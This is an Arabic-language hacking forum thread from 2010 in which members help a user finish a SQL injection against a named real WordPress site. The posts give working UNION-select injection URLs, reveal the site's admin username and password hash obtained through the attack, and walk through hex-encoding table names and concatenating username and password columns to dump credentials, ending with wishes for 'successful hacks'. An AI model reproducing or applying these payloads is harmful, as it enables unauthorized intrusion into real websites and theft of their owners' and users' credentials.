التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-12-2010, 08:57 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hatmoot
 

 

 
إحصائية العضو





hatmoot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hatmoot is on a distinguished road

افتراضي غير مجاب: مساعده من محترفى SQL


السلام عليكم
يا ناس انا جيت لحد الخطوه دى وعطلت

كود PHP:
http://qcsgopc.org/quote.php?ID=13+union+select+1,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns+where+column_name%20+like+char%2837,%20112,%2097,%20115,%20115,%2037%29 
المفروض من وجهه نظرى الخطوه اللى بعديها

كود PHP:
http://qcsgopc.org/quote.php?ID=-13+union+select+1,2,3,wp_posts,5+from+james138 
بس للاسف الباسورد لم يظهر
:a43::a43::a43:
العمود المصاب 4

5.0.67.d7-ourdelta-log :اصدار القاعده version


james138 :اسم القاعده database

ارجو المساعده




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC lshu]i lk lpjvtn SQL

   

رد مع اقتباس
قديم 02-12-2010, 10:48 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية X-Sn4k3
 

 

 
إحصائية العضو







X-Sn4k3 غير متواجد حالياً

إرسال رسالة عبر MSN إلى X-Sn4k3

 

 

إحصائية الترشيح

عدد النقاط : 10
X-Sn4k3 is on a distinguished road

افتراضي


السلام عليكم أخويا هدا هو الاستغلال الصحيح
اسم الجدول
wp_users

وهده هي البيانات
user_login=admin
user_pass=$P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF/

التوقيع

 

   

رد مع اقتباس
قديم 02-12-2010, 10:49 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية X-Sn4k3
 

 

 
إحصائية العضو







X-Sn4k3 غير متواجد حالياً

إرسال رسالة عبر MSN إلى X-Sn4k3

 

 

إحصائية الترشيح

عدد النقاط : 10
X-Sn4k3 is on a distinguished road

افتراضي


هدا الاستغلال هو رابط الاستغلال
http://qcsgopc.org/quote.php?ID=-13+...+from+wp_users

التوقيع

 

   

رد مع اقتباس
قديم 02-12-2010, 10:50 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية X-Sn4k3
 

 

 
إحصائية العضو







X-Sn4k3 غير متواجد حالياً

إرسال رسالة عبر MSN إلى X-Sn4k3

 

 

إحصائية الترشيح

عدد النقاط : 10
X-Sn4k3 is on a distinguished road

افتراضي


تقبل مروري
ســلامــــــــــات

التوقيع

 

   

رد مع اقتباس
قديم 02-12-2010, 11:21 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية hatmoot
 

 

 
إحصائية العضو





hatmoot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hatmoot is on a distinguished road

افتراضي


الف الف الف الف الف شكر اخى X-Sn4k3
بس معلش توضيح
ده الباس $P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF مشفر md5
وده اليوزر admin

   

رد مع اقتباس
قديم 02-13-2010, 12:06 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية X-Sn4k3
 

 

 
إحصائية العضو







X-Sn4k3 غير متواجد حالياً

إرسال رسالة عبر MSN إلى X-Sn4k3

 

 

إحصائية الترشيح

عدد النقاط : 10
X-Sn4k3 is on a distinguished road

افتراضي


hatmoot
طبعأأ أخويا
هدا الباس
$P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF
بس مش من نوع Md5
هدا نوع أخر وصعيب جداا
واليوزر هو admin
موفقــ

التوقيع

 

   

رد مع اقتباس
قديم 02-13-2010, 12:16 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

Smile


السلام عليكم


اخي اولا ./

كود:
http://qcsgopc.org/quote.php?ID=13+union+select+1,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns+where+column_name%20+like+char%2837,%20112,%2097,%20115,%20115,%2037%29
الى هنا الحقنــة صحيحــة..


ثانيــا يا اخي ..

كود:
http://qcsgopc.org/quote.php?ID=-13+union+select+1,2,3,wp_posts,5+from+james138
هذا غلــــط ككككككككككككككككككككككككككككككككككككككبير

شوف اخي عندما استخرجت اعمدة الباسورد وهي ..


wp_posts:post_password:james138


wp_users:user_pass:james138


طبعـــا انت استخرجتها بالحنقه الاولى وهي هذه .

اقتباس
http://qcsgopc.org/quote.php?ID=13+u...20115,%2037%29

طيب لما ظهرت لك الاعمدة او الجداول هذي .



wp_posts:post_password:james138


wp_users:user_pass:james138


اذهــب فــوررأأأ الى هذا المـــوقــع .. وهو موقع التشفير ..


http://waraxe.us/sql-char-encoder.html


طيب الحين ياغالي تاخذ [ اســم الجدول ] ..

وهذا هو wp_posts او wp_users


اختر واحد فيهم واذهب الى الى موقع التشفير وضعــه في الموقع حتى يتم تشفيره


لكي يستخرج لك عمود اليوزر نيــم ..


وهذه صــورة ياغالي ..







الان عرفنا كيف نشفر .. ^^


طيب انسخ الكلام الي ماشر عليه بالصوره بعد التشفير وضعه بعد الامر هذا ..

where+table_name=#


مثال .:


+where+table_name=0x77705f706f737473


الان انسخ الامر كامل ..مع الكلام الي شفرناهـ ..


واذهب الى الحقنـه هذه ..


اقتباس
http://qcsgopc.org/quote.php?ID=13+u...20115,%2037%29

وامــســح هذا الامر تبع الباسورد


where+column_name +like+char(37, 112, 97, 115, 115, 37)

وضــع هذا الامر ..


+where+table_name=0x77705f706f737473


ولا تنسى ان تضع هذا [ -- ] او iهذا [ /* ] اذا كان الموقع لايقبل ..


وبعد ماتفعل سوف يظهر لك اسم اليوزر ..

وهو post_name

لما يظهر اذهب وضع اسم اليوز في العمود المصاب وسوف يظهر لك اسم صاحب الموقع


او اذا اردت ان يظهر لك الباسورد واليوز مع بعض


اكتب هذا الامر في العمود المصاب ..

Concat(user,0x3a,pass)


ضـع مكان user اسسم اليوزر نيم تبع االموقع الي انت طلعتــه

وضع مكان pass اسم عمود الباسورد الي انت طلعتــه وهو post_password او user_pass



وفي نهايت الرابط ضــع هذا الاسسم


james138


وهو ياتي دايمــا اخر كلمــه


wp_posts:post_password:james138


ثم اضغط انتر وسوف يظهر لك اليوز والباسورد ..


ومن ثم الاختراق ..



أرجــو إنــك فـهــمت شرحــي وانا انصــحك تتابع هذا الفهرس تبع الاخ [ فلكانو جزاه الله خيرأأ ]

وهو فهرس لإختراق المواقع بثغرات SQL وبإذن الله سوف تصبح محترف ياغالي

وهذا رابط الفهرس هنا بالمنتدى ..

http://www.vbspiders.com/vb/t22432.html


تحياتي لك اخــي الغالي

:00001793[1]:وأختراقات موفقــه بإذن الله .. :00001793[1]:





التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 02-13-2010, 12:18 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


اسف ياغالي على التاخير بالرد بس كنت اسويلك شرح هههههههههههههههههههههه

بالتوفيق

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 02-13-2010, 04:09 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية hatmoot
 

 

 
إحصائية العضو





hatmoot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hatmoot is on a distinguished road

افتراضي


والله مش عارف اشكركم ازاى
ربنااااااااااااااااااااااااااااااااا يصلح حالكم
شكررررررا اوى اخواتى

X-Sn4k3وDr.NaNo

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
طلب الى محترفي نادي vbspiders wayne جـــ'ابات العناكــ'ب 9 02-28-2018 07:58 AM
طلب من محترفى الحقن sasa22 جـــ'ابات العناكــ'ب 0 10-30-2010 06:26 PM


الساعة الآن 02:42 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0